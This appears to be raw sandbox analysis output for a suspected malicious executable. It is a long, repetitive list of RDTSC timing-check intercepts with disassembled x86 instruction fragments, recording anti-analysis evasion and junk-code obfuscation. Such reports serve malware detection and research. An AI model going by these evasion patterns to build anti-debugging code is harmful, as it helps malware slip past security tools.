                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C820BF second address: C820CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C820CB second address: C820CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C820CF second address: C820D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82189 second address: C8218E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8218E second address: C82199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F9C80FB5666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82199 second address: C821B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F9C81394BFAh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C821B5 second address: C821BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C821BB second address: C821CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C81394BFFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C821CE second address: C821D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C821D2 second address: C821F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jg 00007F9C81394C00h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8227E second address: C822B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F9C80FB5676h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8276C second address: C82770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82770 second address: C82776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82A86 second address: C82ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push ebx 0x0000000f jo 00007F9C81394BF6h 0x00000015 pop ebx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007F9C81394BFEh 0x0000001f push eax 0x00000020 push edx 0x00000021 jne 00007F9C81394BF6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82ACA second address: C82ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82ACE second address: C82AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F9C81394BFCh 0x00000013 js 00007F9C81394BF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82B60 second address: C82B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82B66 second address: C82B73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82B73 second address: C82BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F9C80FB5668h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 clc 0x00000022 lea eax, dword ptr [ebp+1247D51Ah] 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F9C80FB5668h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 mov cx, 864Bh 0x00000046 nop 0x00000047 jmp 00007F9C80FB566Bh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F9C80FB5676h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82BF1 second address: C82BFB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82BFB second address: C82C61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9C80FB5674h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9C80FB5677h 0x00000011 lea eax, dword ptr [ebp+1247D4D6h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F9C80FB5668h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D1DCCh], ecx 0x00000037 nop 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82C61 second address: C82C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9F3A second address: CB9F57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F9C80FB566Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F9C80FB5666h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9F57 second address: CB9F80 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9C81394BF6h 0x00000008 jp 00007F9C81394BF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9C81394C03h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9F80 second address: CB9F90 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9C80FB5666h 0x00000008 js 00007F9C80FB5666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBA348 second address: CBA352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9C81394BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBA352 second address: CBA35B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBA35B second address: CBA361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBA51C second address: CBA521 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C40294 second address: C40298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF43C second address: CBF445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF445 second address: CBF449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF449 second address: CBF46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5671h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F9C80FB5668h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF46E second address: CBF474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF5E8 second address: CBF60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F9C80FB5666h 0x0000000f jmp 00007F9C80FB5674h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF60B second address: CBF616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF76A second address: CBF7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5677h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jmp 00007F9C80FB5678h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF7A0 second address: CBF7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBFD55 second address: CBFD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBFFFD second address: CC0003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC0003 second address: CC0007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC0007 second address: CC000B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC000B second address: CC0038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9C80FB5666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f ja 00007F9C80FB5666h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop esi 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9C80FB566Dh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC0038 second address: CC003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC078D second address: CC07AC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9C80FB5666h 0x00000008 jmp 00007F9C80FB5672h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC07AC second address: CC07F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F9C81394C08h 0x00000010 jmp 00007F9C81394C03h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F9C81394BFDh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC07F3 second address: CC07FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF019 second address: CBF01E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF01E second address: CBF06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9C80FB5666h 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007F9C80FB5666h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F9C80FB566Bh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jno 00007F9C80FB567Eh 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 jg 00007F9C80FB5666h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C3CC2A second address: C3CC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F9C81394C05h 0x0000000a jnp 00007F9C81394C15h 0x00000010 jmp 00007F9C81394C09h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC6C72 second address: CC6C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB566Fh 0x00000009 pop edi 0x0000000a jnc 00007F9C80FB566Eh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC3F9 second address: CCC3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC3FF second address: CCC403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC403 second address: CCC409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC409 second address: CCC41A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F9C80FB566Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC41A second address: CCC42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9C81394BFDh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC42E second address: CCC45D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9C80FB566Ch 0x0000000f push eax 0x00000010 jmp 00007F9C80FB5676h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC45D second address: CCC462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCB14C second address: CCB17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007F9C80FB566Fh 0x0000000b pop edi 0x0000000c jns 00007F9C80FB566Eh 0x00000012 popad 0x00000013 pushad 0x00000014 jbe 00007F9C80FB566Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCB2E2 second address: CCB2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCB6EE second address: CCB6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCAE88 second address: CCAE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC102 second address: CCC10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCF05B second address: CCF077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9C81394BF6h 0x0000000a jmp 00007F9C81394C02h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD1D3E second address: CD1D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD1ED9 second address: CD1EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9C81394BF6h 0x0000000a jmp 00007F9C81394C03h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD1EFA second address: CD1F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD1F00 second address: CD1F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD206F second address: CD2073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD21D1 second address: CD21D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C43825 second address: C43840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5677h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C43840 second address: C43846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C41D17 second address: C41D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C41D1B second address: C41D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9C81394BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C41D2A second address: C41D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5670h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD8CCE second address: CD8CE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD8CE0 second address: CD8CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD8CE6 second address: CD8CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C825A6 second address: C825EC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1E75h], edi 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F9C80FB5668h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 xor di, A4D6h 0x00000035 nop 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C825EC second address: C82609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD94EC second address: CD94F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD94F2 second address: CD94F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD94F8 second address: CD9514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDA08E second address: CDA09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDF0AA second address: CDF0BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDF0BB second address: CDF0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDF0C1 second address: CDF0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9C80FB5666h 0x0000000a rdtsc
